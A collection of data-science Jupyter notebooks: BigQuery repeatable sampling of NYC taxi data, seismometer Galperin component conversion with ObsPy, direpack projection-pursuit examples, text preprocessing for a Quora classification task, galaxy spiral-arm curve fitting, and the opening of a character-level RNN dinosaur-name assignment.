## Sample data repeatably
There's one issue with using `RAND() < N` to sample. It's non-deterministic. Each time you run the query above you'll get a different sample.
Since repeatability is key to data science, let's instead use a hash function (which is deterministic by definition) and then sample the using the modulo operation on the hashed value.
We obtain our hash values using:
`ABS(FARM_FINGERPRINT(CAST(hashkey AS STRING)))`
Working from inside out:
- `CAST()`: Casts hashkey to string because our hash function only works on strings
- `FARM_FINGERPRINT()`: Hashes strings to 64bit integers
- `ABS()`: Takes the absolute value of the integer. This is not strictly neccesary but it makes the following modulo operations more intuitive since we don't have to account for negative remainders.*
The `hashkey` should be:
1. Unrelated to the objective
2. Sufficiently high cardinality
Given these properties we can sample our data repeatably using the modulo operation.
To get a 1% sample:
`WHERE MOD(hashvalue,100) = 0`
To get a *different* 1% sample change the remainder condition, for example:
`WHERE MOD(hashvalue,100) = 55`
To get a 20% sample:
`WHERE MOD(hashvalue,100) < 20` Alternatively: `WHERE MOD(hashvalue,5) = 0`
And so forth...
We'll use `pickup_datetime` as our hash key because it meets our desired properties. If such a column doesn't exist in the data you can synthesize a hashkey by concatenating multiple columns.
Below we sample 1/5000th of the data. The syntax is admittedly less elegant than `RAND() < N`, but now each time you run the query you'll get the same result.
\**Tech note: Taking absolute value doubles the chances of hash collisions but since there are 2^64 possible hash values and less than 2^30 hash keys the collision risk is negligable.*
#### **Exercise 1**
Modify the BigQuery query above to produce a repeatable sample of the taxi fare data.
Replace the RAND operation above with a FARM_FINGERPRINT operation that will yield a repeatable 1/5000th sample of the data.
```
%%bigquery --project $PROJECT
# TODO: Your code goes here
```
## Load sample into Pandas dataframe
The advantage of querying BigQuery directly as opposed to the web UI is that we can supplement SQL analysis with Python analysis. A popular Python library for data analysis on structured data is [Pandas](https://pandas.pydata.org/), and the primary data strucure in Pandas is called a DataFrame.
To store BigQuery results in a Pandas DataFrame we have have to query the data with a slightly differently syntax.
1. Import the `google.bigquery` module (alias as `bq`)
2. Store the desired SQL query as a Python string
3. Execute `bq.Query(query_string).execute().result().to_dataframe()` where `query_string` is what you created in the previous step
**This will take about a minute**
*Tip: Use triple quotes for a multi-line string in Python*
*Tip: You can measure execution time of a cell by starting that cell with `%%time`*
#### **Exercise 2**
Store the results of the query you created in the previous TODO above in a Pandas DataFrame called `trips`.
You will need to import the `bigquery` module from Google Cloud and store the query as a string before executing the query. Then,
- Create a variable called `bq` which contains the BigQuery Client
- Copy/paste the query string from above
- Use the BigQuery Client to execute the query and save it to a Pandas dataframe
```
%%time
from google.cloud import bigquery
bq = # TODO: Your code goes here
query_string="""
# TODO: Your code goes here
"""
trips = # TODO: Your code goes here
```
## Explore datafame
```
print(type(trips))
trips.head()
```
The Python variable `trips` is now a Pandas DataFrame. The `.head()` function above prints the first 5 rows of a DataFrame.
The rows in the DataFrame may be in a different order than when using `%%bq query`, but the data is the same.
It would be useful to understand the distribution of each of our columns, which is to say the mean, min, max, standard deviation etc..
A DataFrame's `.describe()` method provides this. By default it only analyzes numeric columns. To include stats about non-numeric column use `describe(include='all')`.
```
trips.describe()
```
## Distribution analysis
Do you notice anything off about the data? Pay attention to `min` and `max`. Latitudes should be between -90 and 90, and longitudes should be between -180 and 180, so clearly some of this data is bad.
Further more some trip fares are negative and some passenger counts are 0 which doesn't seem right. We'll clean this up later.
## Investigate trip distance
Looks like some trip distances are 0 as well, let's investigate this.
```
trips[trips['trip_distance'] == 0][:10] # first 10 rows with trip_distance == 0
```
It appears that trips are being charged substantial fares despite having 0 distance.
Let's graph `trip_distance` vs `fare_amount` using the Pandas [`.plot()`](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.plot.html) method to corroborate.
```
%matplotlib inline
trips.plot(x ="trip_distance", y ="fare_amount", kind='scatter')
```
It appears that we have a lot of invalid data that is being coded as zero distance and some fare amounts that are definitely illegitimate. Let's remove them from our analysis. We can do this by modifying the BigQuery query to keep only trips longer than zero miles and fare amounts that are at least the minimum cab fare ($2.50).
## Identify correct label
Should we use `fare_amount` or `total_amount` as our label? What's the difference?
To make this clear let's look at some trips that included a toll.
#### **Exercise 3**
Use the pandas DataFrame indexing to look at a subset of the trips dataframe created above where the `tolls_amount` is positive.
**Hint**: You can index the dataframe over values which have `trips['tolls_amount'] > 0`.
```
# TODO: Your code goes here
```
What do you see looking at the samples above? Does `total_amount` always reflect the `fare amount` + `tolls_amount` + `tip`? Why would there be a discrepancy?
To account for this, we will use the sum of `fare_amount` and `tolls_amount`
## Select useful fields
What fields do you see that may be useful in modeling taxifare? They should be
1. Related to the objective
2. Available at prediction time
**Related to the objective**
For example we know `passenger_count` shouldn't have any affect on fare because fare is calculated by time and distance. Best to eliminate it to reduce the amount of noise in the data and make the job of the ML algorithm easier.
If you're not sure whether a column is related to the objective, err on the side of keeping it and let the ML algorithm figure out whether it's useful or not.
**Available at prediction time**
For example `trip_distance` is certainly related to the objective, but we can't know the value until a trip is completed (depends on the route taken), so it can't be used for prediction.
**We will use the following**
`pickup_datetime`, `pickup_longitude`, `pickup_latitude`, `dropoff_longitude`, and `dropoff_latitude`.
## Clean the data
We need to do some clean-up of the data:
- Filter to latitudes and longitudes that are reasonable for NYC
- the pickup longitude and dropoff longitude should lie between -70 degrees and -78 degrees
- the pickup_latitude and dropoff longitude should lie between 37 degrees and 45 degrees
- We shouldn't include fare amounts less than $2.50
- Trip distances and passenger counts should be non-zero
- Have the label reflect the sum of fare_amount and tolls_amount
Let's change the BigQuery query appropriately, and only return the fields we'll use in our model.
#### **Exercise 4**
Look at the TODOs in the SQL query below. Add some addtionals to the `WHERE` clause to restrict the fare amount of the taxi rides and the pickup and dropoff latitude and longitude values.
```
%%bigquery --project $PROJECT
#standardSQL
SELECT
(tolls_amount + fare_amount) AS fare_amount, -- create label that is the sum of fare_amount and tolls_amount
pickup_datetime,
pickup_longitude,
pickup_latitude,
dropoff_longitude,
dropoff_latitude
FROM
`nyc-tlc.yellow.trips`
WHERE
-- Clean Data
trip_distance > 0
AND passenger_count > 0
TODO: Your code goes here
TODO: Your code goes here
-- create a repeatable 1/5000th sample
AND MOD(ABS(FARM_FINGERPRINT(CAST(pickup_datetime AS STRING))),5000) = 1
```
We now have a repeatable and clean sample we can use for modeling taxi fares.
Copyright 2019 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
| github_jupyter |
# **Galperin Conversion**
In this module we convert the Z,N,E output of a seismometer with Galperin topology, also known as _homogeneous triaxial arrangement_ and used i.e. in the STS-2 series and the Nanometrics Trillium family, back to the original U,V,W traces of the three internal sensors. It also gives the option to re-convert from U,V,W to Z,N,E. This module contains only the conversion matrix for the STS-2 and not for the Trillium family of instruments. It also should not be used with the output of seismometers with a classical topology, where the three internal sensor are orthogonally arranged along the cardinal directions Z,N,E (i.e. Guralp 3T or MBB-2).
```
import numpy as np
import matplotlib.pyplot as plt
import obspy
from obspy import read, read_inventory
from obspy import UTCDateTime
```
Read file with stream to be converted
```
str = read("./Instr Test/STS-2-Test")
print(str.__str__(extended=True))
#create overview plots full length of file
str.plot(color='black',size=(1000,400),equal_scale=True)
numpoints=(str[0].stats.npts)
print (numpoints)
```
Separate the data stream into three arrays containing the traces Z,N,E. Converting them into three different arrays containing the traces U,V,W
```
%%time
t=np.zeros(numpoints)
U=np.zeros(numpoints)
V=np.zeros(numpoints)
W=np.zeros(numpoints)
Z=str[2].data
N=str[1].data
E=str[0].data
#preparing the conversation matrix for STS-2 only
w6=np.sqrt(6)
w6=1/w6
w3=np.sqrt(3)
w2=np.sqrt(2)
print (w6,w3,w2)
for i in range (numpoints):
t[i]=i/100
U[i]= w6*(-2*E[i]+w2*Z[i])
V[i]= w6*(E[i]+w3*N[i]+w2*Z[i])
W[i]= w6*(E[i]-w3*N[i]+w2*Z[i])
#plotting the new traces U,V,W
plt.rcParams['figure.figsize'] = [12, 5]
plt.plot (t,U,color='r',label="U")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,V,color='b',label="V")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,W,color='g',label="W")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid(which='both')
plt.legend()
plt.show()
```
Check if the conversion was done correctly by reconverting back to Z,N,E and plotting each trace on top of its original. Then compute the residual (Z-Z1 etc.) for each pair of traces
```
%%time
Z1=np.zeros(numpoints)
N1=np.zeros(numpoints)
E1=np.zeros(numpoints)
ZR=np.zeros(numpoints)
NR=np.zeros(numpoints)
ER=np.zeros(numpoints)
for i in range (numpoints):
Z1[i]= w6*(w2*U[i]+w2*V[i]+w2*W[i])
N1[i]= w6*(w3*V[i]-w3*W[i])
E1[i]= w6*(-2*U[i]+V[i]+W[i])
ZR[i]=abs(Z[i]-Z1[i])
NR[i]=abs(N[i]-N1[i])
ER[i]=abs(E[i]-E1[i])
plt.plot (t,Z,color='black',label="Z")
plt.plot (t,Z1,color='green',label="Z reconv")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,N,color='black',label="N")
plt.plot (t,N1,color='red',label="N reconv")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,E,color='black',label="E")
plt.plot (t,E1,color='blue',label="E reconv")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
#plot residual
plt.plot (t,ZR,color='green',label="residual Z")
plt.ylabel('Counts')
plt.xlabel("Seconds after 22:11:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,NR,color='red',label="residual N")
plt.ylabel('Counts')
plt.xlabel("Seconds after 22:11:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,ER,color='blue',label="residual E")
plt.ylabel('Counts')
plt.xlabel("Seconds after 22:11:00 UTC")
plt.grid()
plt.legend()
plt.show()
```
How do Z,N,E look like when one of the U,V,W sensors is down, i.e. its boom is at one of the ends?
```
#select time window in sec
dt=300
Ztest=np.zeros(300)
Ntest=np.zeros(300)
Etest=np.zeros(300)
timetest=np.zeros(300)
udown=599
vdown=1549
wdown=1099
#selecting traces while U is down
for i in range (300):
udown=udown+i
Ztest[i]=Z[udown]
Ntest[i]=N[udown]
Etest[i]=E[udown]
timetest[i]=t[udown]
plt.plot(timetest,Ztest)
plt.plot(timetest,Ntest)
plt.plot(timetest,Etest)
plt.title ("U sensor down")
```
| github_jupyter |
`ppdire.py` subpackage: examples
================================
Here, we will illustrate how to use `ppdire.py` to perform different types of projection pursuit dimension reduction.
To run a toy example, start by sourcing packages and data:
```
# Load data
import pandas as ps
import numpy as np
data = ps.read_csv("../data/Returns_shares.csv")
columns = data.columns[2:8]
(n,p) = data.shape
datav = np.matrix(data.values[:,2:8].astype('float64'))
y = datav[:,0]
X = datav[:,1:5]
# Scale data
from direpack import VersatileScaler
centring = VersatileScaler()
Xs = centring.fit_transform(X)
```
1\. Comparison of PP estimates to Scikit-Learn
======================================
Let us at first run `ppdire` to produce slow, approximate PP estimates of
PCA and PLS. This makes it easy to verify that the algorithm is correct.
1\.1\. PCA
--------------
By setting the projection index to variance, projection pursuit is a slow, approximate way to calculate PCA. Let's compare the `ppdire` results to `sklearn`'s.
- PCA ex `scikit-learn`
```
import sklearn.decomposition as skd
skpca = skd.PCA(n_components=4)
skpca.fit(Xs)
skpca.components_.T # sklearn outputs loadings as rows !
```
- PCA ex `ppdire`, using SLSQP optimization
```
from direpack import dicomo, ppdire
pppca = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'var'}, n_components=4, optimizer='SLSQP')
pppca.fit(X)
pppca.x_loadings_
```
- PCA ex `ppdire`, using its native `grid` algorithm optimization \[1\].
```
pppca = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'var'}, n_components=4, optimizer='grid',optimizer_options={'ndir':1000,'maxiter':1000})
pppca.fit(X)
pppca.x_loadings_
```
1\.2\. PLS
----------
Likewise, by setting the projection index to covariance, one obtains partial least squares.
- PLS ex `scikit-learn`
```
import sklearn.cross_decomposition as skc
skpls = skc.PLSRegression(n_components=4)
skpls.fit(Xs,(y-np.mean(y))/np.std(y))
skpls.x_scores_
print(skpls.coef_)
np.matmul(Xs,skpls.coef_)*np.std(y) + np.mean(y)
```
- PLS ex `ppdire`, using SLSQP optimization
```
pppls = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'cov'}, n_components=4, square_pi=True, optimizer='SLSQP', optimizer_options={'maxiter':500})
pppls.fit(X,y)
pppls.x_scores_
print(pppls.coef_scaled_) # Column 4 should agree with skpls.coef_
pppls.fitted_
```
- PLS ex `ppdire`, `grid` optimization
```
pppls = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'cov'}, n_components=4, square_pi=True, optimizer='grid',optimizer_options={'ndir':1000,'maxiter':1000})
pppls.fit(X,y)
pppls.x_scores_
print(pppls.coef_scaled_) # Column 4 should agree with skpls.coef_
pppls.fitted_
```
Remark: Dimension Reduction techniques based on projection onto latent variables,
such as PCA, PLS and ICA, are sign indeterminate with respect to the components.
Therefore, signs of estimates by different algorithms can be opposed, yet the
absolute values should be identical up to algorithm precision. Here, this implies
that `sklearn` and `ppdire`'s `x_scores_` and `x_loadings` can have opposed signs,
yet the coefficients and fitted responses should be identical.
2\. Robust projection pursuit estimators
=================================
Note that optimization through `scipy.optimize` is much more efficient than the native `grid` algorithm, yet will only provide correct results for classical projection indices. The native `grid` algorithm should be used when
the projection index involves order statistics of any kind, such as ranks, trimming, winsorizing, or empirical quantiles.
- Robust PCA based on the Median Absolute Deviation (MAD) \[2\].
```
lcpca = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'var', 'center': 'median'}, n_components=4, optimizer='grid',optimizer_options={'ndir':1000,'maxiter':10})
#set a higher maxiter for convergence and precision!
lcpca.fit(X)
lcpca.x_loadings_
```
To extend to Robust PCR, just add `y`:
```
lcpca.fit(X,y,regopt='robust')
```
- Robust Continuum Regression \[4\] based on trimmed continuum association:
```
rcr = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'continuum'}, n_components=4, trimming=.1, alpha=.5, optimizer='grid',optimizer_options={'ndir':250,'maxiter':1000})
rcr.fit(X,y=y,regopt='robust')
rcr.x_loadings_
rcr.x_scores_
rcr.coef_scaled_
rcr.predict(X[:2666])
```
Let us now plot the results. The `plot` subpackage contains a plotting function for `ppdire`. To plot predicted vs. actual values:
```
from direpack import ppdire_plot
dr_plot=ppdire_plot(rcr,['w','w','g','y','m','b','k'])
dr_plot.plot_yyp(label='KMB',title='fitted vs true quotation, training set')
dr_plot.plot_yyp(ytruev=y[2666:],Xn=X[2666:],label='KMB',title='fitted vs true quotation, test set')
```
To plot scores:
```
dr_plot.plot_projections(Xn=X[2666:],label='KMB',title='fitted vs true quotation, test set')
```
3\. Projection pursuit generalized betas
================================
Generalized betas are obtained as the projection pursuit weights using the
co-moment analysis projection index (CAPI) \[2\].
```
from direpack import capi
est = ppdire(projection_index = capi, pi_arguments = {'max_degree' : 3,'projection_index': dicomo, 'scaling': False}, n_components=1, trimming=0,center_data=True,scale_data=True)
est.fit(X,y=y,ndir=200)
est.x_weights_
```
Note that these data aren't the greatest illustration. Evaluating CAPI projections, makes more sense if y is a market index, e.g. SPX.
4\. Cross-validating through `scikit-learn`
===========================================
The `ppdire` class is 100% compatible with `scikit-learn`, which allows, for instance, hyperparameter tuning through `GridSearchCV`.
To try out, uncomment the line below and run. (this may take some time).
```
# Uncomment to try out:
# from sklearn.model_selection import GridSearchCV
# rcr_cv = GridSearchCV(ppdire(projection_index=dicomo,
# pi_arguments = {'mode' : 'continuum'
# },
# optimizer = 'grid',
# optimizer_options = {'ndir':1000,'maxiter':1000}
# ),
# cv=10,
# param_grid={"n_components": [1, 2, 3],
# "alpha": np.arange(.1,3,.3).tolist(),
# "trimming": [0, .15]
# }
# )
# rcr_cv.fit(X[:2666],y[:2666])
# rcr_cv.best_params_
# rcr_cv.predict(X[2666:])
```
5\. Data compression
=================
While `ppdire` is very flexible and can project according to a very wide variety
of projection indices, it can be computationally demanding. For flat data tables,
a workaround has been built in. However, not that running the code in the next field can take quite some time nonetheless.
```
# Load flat data
datan = ps.read_csv("../data/Glass_df.csv")
X = datan.values[:,100:300]
y = datan.values[:,2]
# Now compare
rcr = ppdire(projection_index = dicomo,
pi_arguments = {'mode' : 'continuum'},
n_components=4,
trimming=.1,
alpha=.5,
compression = False,
optimizer='grid',
optimizer_options={'ndir':1000,'maxiter':1000})
rcr.fit(X,y)
print(rcr.coef_)
rcr = ppdire(projection_index = dicomo,
pi_arguments = {'mode' : 'continuum'},
n_components=4,
trimming=.1,
alpha=.5,
compression = True,
optimizer='grid',
optimizer_options={'ndir':1000,'maxiter':1000})
rcr.fit(X,y)
rcr.coef_
```
However, compression will not work properly if the data contain several low scale
varables. In this example, it will not work for `X = datan.values[:,8:751]`. This
will throw a warning, and `ppdire` will continue without compression.
References
----------------
1. [Robust Multivariate Methods: The Projection Pursuit Approach](https://link.springer.com/chapter/10.1007/3-540-31314-1_32), Peter Filzmoser, Sven Serneels, Christophe Croux and Pierre J. Van Espen, in: From Data and Information Analysis to Knowledge Engineering, Spiliopoulou, M., Kruse, R., Borgelt, C., Nuernberger, A. and Gaul, W., eds., Springer Verlag, Berlin, Germany, 2006, pages 270--277.
2. [Projection pursuit based generalized betas accounting for higher order co-moment effects in financial market analysis](https://arxiv.org/pdf/1908.00141.pdf), Sven Serneels, in: JSM Proceedings, Business and Economic Statistics Section. Alexandria, VA: American Statistical Association, 2019, 3009-3035.
3. Robust principal components and dispersion matrices via projection pursuit, Chen, Z. and Li, G., Research Report, Department of Statistics, Harvard University, 1981.
4. [Robust Continuum Regression](https://www.sciencedirect.com/science/article/abs/pii/S0169743904002667), Sven Serneels, Peter Filzmoser, Christophe Croux, Pierre J. Van Espen, Chemometrics and Intelligent Laboratory Systems, 76 (2005), 197-204.
| github_jupyter |
测试数据预处理
```
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
import time
import random
from tqdm import tqdm
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.model_selection import GridSearchCV, StratifiedKFold
from sklearn.metrics import f1_score, roc_auc_score
from collections import Counter
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
data_dir = "../input/"
train_file = os.path.join(data_dir, "train.csv")
test_file = os.path.join(data_dir, "test.csv")
embedding_size = 300
max_len = 50
max_features = 100000
batch_size = 256
train_df = pd.read_csv(train_file)
# test_df = pd.read_csv(test_file)
print("Train shape : ",train_df.shape)
# print("Test shape : ",test_df.shape)
# data cleaning
train_df["question_text"] = train_df["question_text"].str.lower()
# test_df["question_text"] = test_df["question_text"].str.lower()
## fill up the missing values
train_X = train_df["question_text"].fillna("_NA_").values
# test_X = test_df["question_text"].fillna("_##_").values
train_X[:5]
# # 加入30个停用词
# filters = []
# standard_filters = '!"#$%&()*+,-./:;<=>?@[\]^_`{|}~\t\n'
# for s in standard_filters:
# filters.append(s)
# stop_words = ['does', 'a', 'that', 'to', 'or', 'in', 'if', 'the', 'how', 'can', 'have', 'and', 'of', 'what', 'you', 'be', 'from', 'an',\
# 'why', 'on', 'with', 'which', 'are', 'your', 'do', 'my', 'i', 'is', 'it', 'for']
# filters.extend(stop_words)
# print(filters)
tokenizer = Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(list(train_X))
train_X = tokenizer.texts_to_sequences(train_X)
train_Y = train_df['target'].values
print(np.sum(train_Y))
# remove_words = []
# for x in train_X:
# remove_words.append([i for i in x if i>40])
# train_X = remove_words
train_X[:5]
DATA_SPLIT_SEED = 2018
splits = list(StratifiedKFold(n_splits=5, shuffle=True, random_state=DATA_SPLIT_SEED).split(train_X, train_Y))
for x in train_X:
if len(x) == 0:
print(x)
# 正样本欠采样,负样本数据增强
def data_augmentation(X, Y, under_sample=200000, aug=2):
"""
under_sample: 欠采样个数
aug: 数据增强倍数
"""
pos_X = []
neg_X = []
for i in range(len(X)):
if Y[i] == 1:
neg_X.append(X[i])
else:
pos_X.append(X[i])
# print(len(pos_X))
# print(len(neg_X))
# 正样本欠采样
random.shuffle(pos_X)
pos_X = pos_X[:-under_sample]
# 负样本数据增强
neg_X2 = []
for x in neg_X:
random.shuffle(x)
neg_X2.append(x)
random.shuffle(x)
neg_X2.append(x)
neg_X.extend(neg_X2)
# print(len(pos_X))
# print(len(neg_X))
pos_Y = np.zeros(shape=[len(pos_X)], dtype=np.int32)
neg_Y = np.ones(shape=[len(neg_X)], dtype=np.int32)
return pos_X+neg_X, np.append(pos_Y, neg_Y)
train_X, train_Y = data_augmentation(train_X, train_Y)
index = 0
for x in train_X:
index += 1
if len(x)==0:
print(x)
index
len_num = 0
for x in train_X:
if len(x)>=20:
len_num += 1
len_num
tokenizer.texts_to_sequences(np.array(['dsjdhsjhdsdh make love']))
def get_key (dict, value):
return [k for k, v in dict.items() if v <= value]
print(get_key(tokenizer.word_index, 30))
train_X = pad_sequences(train_X, maxlen=max_len, padding="post", truncating="post")
train_X[:5]
train_X = np.where(train_X>=40, train_X, 0)
train_X[:5]
```
| github_jupyter |
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from gzbuilderspirals import r_theta_from_xy, xy_from_r_theta
import lib.galaxy_utilities as gu
from gzbuilderspirals import fitting
with open('./lib/subject-id-list.csv', 'r') as f:
subjectIds = np.array([int(n) for n in f.read().split('\n')])
chosenId = 21097008 #subjectIds[0]
# chosenId = 21686558
gal, angle = gu.get_galaxy_and_angle(chosenId)
pic_array, deprojected_image = gu.get_image(
gal, chosenId, angle
)
galaxy_object = gu.get_galaxy_spirals(
gal, angle, chosenId, gu.classifications
)
# which arm should we work on?
armN = 0
deprojected_arm = galaxy_object.deproject_arms()[armN]
plt.figure(0, [8]*2); [plt.plot(*arm.T, '.-') for arm in deprojected_arm.drawn_arms]; None
R, t = deprojected_arm.unwrap_and_sort()
a = np.argsort(R)
plt.plot(R, t, '.')
plt.ylabel('Theta')
plt.xlabel('Radius from center')
fitting_result = deprojected_arm.fit()
fitting_result.keys()
def recursiveDictExplore(d):
if type(d) != dict:
return str(type(d))
k = d.keys()
return {i: recursiveDictExplore(d[i]) for i in k}
# __import__('pprint').pprint(recursiveDictExplore(fitting_result))
fitting_result['clf']
sample_weights = deprojected_arm.get_sample_weight(R)
# plt.plot(R, sample_weights)
log_spiral = fitting.log_spiral_fit(R, t, sample_weight=sample_weights)
plt.plot(R, t, '.', markersize=2)
plt.plot(log_spiral['R'], log_spiral['T'])
plt.fill_between(
log_spiral['R'],
log_spiral['T'] - log_spiral['T_std'],
log_spiral['T'] + log_spiral['T_std'],
color='k', alpha=0.2
)
plt.ylabel(r'Spiral arm $\theta$')
plt.xlabel('Radius from center')
plt.xscale('log')
plt.title('Log Spiral fit, AIC: {}, BIC: {}'.format(log_spiral['AIC'], log_spiral['BIC']))
plt.ylim(min(t)-0.5, max(t)+0.5)
polynomials = fitting.get_polynomial_fits(R, t)
plt.figure(figsize=(8, 8))
plt.plot([i['k'] for i in polynomials], [i['AIC'] for i in polynomials], label='AIC')
plt.plot([i['k'] for i in polynomials], [i['BIC'] for i in polynomials], label='BIC')
plt.plot([2], [log_spiral['AIC']], 'x', markersize=10, label='Log Spiral AIC')
plt.plot([2], [log_spiral['BIC']], 'x', markersize=10, label='Log Spiral BIC')
best_aic = polynomials[np.argmin([i['AIC'] for i in polynomials])]
plt.plot([best_aic['k']], [best_aic['AIC']], 'o', markersize=10, label='Best polynomial AIC')
best_bic = polynomials[np.argmin([i['BIC'] for i in polynomials])]
plt.plot([best_bic['k']], [best_bic['BIC']], 'o', markersize=10, label='Best polynomial BIC')
plt.legend()
_ = plt.xticks([i['k'] for i in polynomials])
logSpiral_xy = xy_from_r_theta(log_spiral['R'], log_spiral['T'])
poly_best_aic_xy = xy_from_r_theta(best_aic['R'], best_aic['T'])
poly_aic_lower_xy = xy_from_r_theta(best_aic['R'], best_aic['T'] - best_aic['T_std'])
poly_aic_upper_xy = xy_from_r_theta(best_aic['R'], best_aic['T'] + best_aic['T_std'])
poly_best_bic_xy = xy_from_r_theta(best_bic['R'], best_bic['T'])
poly_bic_lower_xy = xy_from_r_theta(best_bic['R'], best_bic['T'] - best_bic['T_std'])
poly_bic_upper_xy = xy_from_r_theta(best_bic['R'], best_bic['T'] + best_bic['T_std'])
plt.figure(figsize=(15, 7)); plt.subplot(121)
plt.plot(R, t, '.', markersize=2)
# plot the log spiral
plt.plot(log_spiral['R'], log_spiral['T'], linewidth=2)
plt.fill_between(
log_spiral['R'],
log_spiral['T'] - log_spiral['T_std'],
log_spiral['T'] + log_spiral['T_std'],
color='C1', alpha=0.2
)
# plot the best polynomial (selected using AIC)
plt.plot(best_aic['R'], best_aic['T'], linewidth=2)
plt.fill_between(
best_aic['R'],
best_aic['T'] - best_aic['T_std'],
best_aic['T'] + best_aic['T_std'],
color='C2', alpha=0.2
)
plt.ylim(min(t)-0.5, max(t)+0.5)
plt.ylabel(r'Spiral arm $\theta$')
plt.xlabel('Radius from center')
plt.subplot(122)
plt.plot(*xy_from_r_theta(R, t), '.', markersize=2)
plt.plot(*logSpiral_xy,
linewidth=2, label='Log spiral')
plt.plot(*poly_best_aic_xy,
linewidth=2, label='Best AIC polynomial ($k={}$)'.format(best_aic['k']))
plt.plot(*poly_aic_lower_xy, '.-', c='C3', alpha=0.5)
plt.plot(*poly_aic_upper_xy, '.-', c='C3', alpha=0.5)
plt.plot(*poly_best_bic_xy,
'--', linewidth=2, label='Best BIC polynomial ($k={}$)'.format(best_bic['k']))
plt.legend()
plt.axis('equal')
plt.figure(0, [8]*2)
plt.imshow(deprojected_image, cmap='gray_r', origin='lower')
plt.plot(*deprojected_arm.cleaned_cloud.T, '.', markersize=2, alpha=0.1)
plt.plot(*deprojected_arm.de_normalise(np.array(logSpiral_xy)))
plt.plot(*deprojected_arm.de_normalise(np.array(poly_best_aic_xy)))
```
And there we are, splines, plots and AIC
```
plt.plot(*deprojected_arm.get_r_bin_weights(deprojected_arm.drawn_arms))
plt.plot(r_bins, z)
```
| github_jupyter |
# Character level language model - Dinosaurus Island
Welcome to Dinosaurus Island! 65 million years ago, dinosaurs existed, and in this assignment they are back. You are in charge of a special task. Leading biology researchers are creating new breeds of dinosaurs and bringing them to life on earth, and your job is to give names to these dinosaurs. If a dinosaur does not like its name, it might go berserk, so choose wisely!
<table>
<td>
<img src="images/dino.jpg" style="width:250;height:300px;">
</td>
</table>
Luckily you have learned some deep learning and you will use it to save the day. Your assistant has collected a list of all the dinosaur names they could find, and compiled them into this [dataset](dinos.txt). (Feel free to take a look by clicking the previous link.) To create new dinosaur names, you will build a character level language model to generate new names. Your algorithm will learn the different name patterns, and randomly generate new names. Hopefully this algorithm will keep you and your team safe from the dinosaurs' wrath!
By completing this assignment you will learn:
- How to store text data for processing using an RNN
- How to synthesize data, by sampling predictions at each time step and passing it to the next RNN-cell unit
- How to build a character-level text generation recurrent neural network
- Why clipping the gradients is important
We will begin by loading in some functions that we have provided for you in `rnn_utils`. Specifically, you have access to functions such as `rnn_forward` and `rnn_backward` which are equivalent to those you've implemented in the previous assignment.
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "3a".
* You can find your original work saved in the notebook with the previous version name ("v3")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates
* Sort and print `chars` list of characters.
* Import and use pretty print
* `clip`:
- Additional details on why we need to use the "out" parameter.
- Modified for loop to have students fill in the correct items to loop through.
- Added a test case to check for hard-coding error.
* `sample`
- additional hints added to steps 1,2,3,4.
- "Using 2D arrays instead of 1D arrays".
- explanation of numpy.ravel().
- fixed expected output.
- clarified comments in the code.
* "training the model"
- Replaced the sample code with explanations for how to set the index, X and Y (for a better learning experience).
* Spelling, grammar and wording corrections.
```
import numpy as np
from utils import *
import random
import pprint
```
## 1 - Problem Statement
### 1.1 - Dataset and Preprocessing
Run the following cell to read the dataset of dinosaur names, create a list of unique characters (such as a-z), and compute the dataset and vocabulary size.
```
data = open('dinos.txt', 'r').read()
data = data.lower()
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print('There are %d total characters and %d unique characters in your data.' % (data_size, vocab_size))
```
* The characters are a-z (26 characters) plus the "\n" (or newline character).
* In this assignment, the newline character "\n" plays a role similar to the `<EOS>` (or "End of sentence") token we had discussed in lecture.
- Here, "\n" indicates the end of the dinosaur name rather than the end of a sentence.
* `char_to_ix`: In the cell below, we create a python dictionary (i.e., a hash table) to map each character to an index from 0-26.
* `ix_to_char`: We also create a second python dictionary that maps each index back to the corresponding character.
- This will help you figure out what index corresponds to what character in the probability distribution output of the softmax layer.
```
chars = sorted(chars)
print(chars)
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(ix_to_char)
```
### 1.2 - Overview of the model
Your model will have the following structure:
- Initialize parameters
- Run the optimization loop
- Forward propagation to compute the loss function
- Backward propagation to compute the gradients with respect to the loss function
- Clip the gradients to avoid exploding gradients
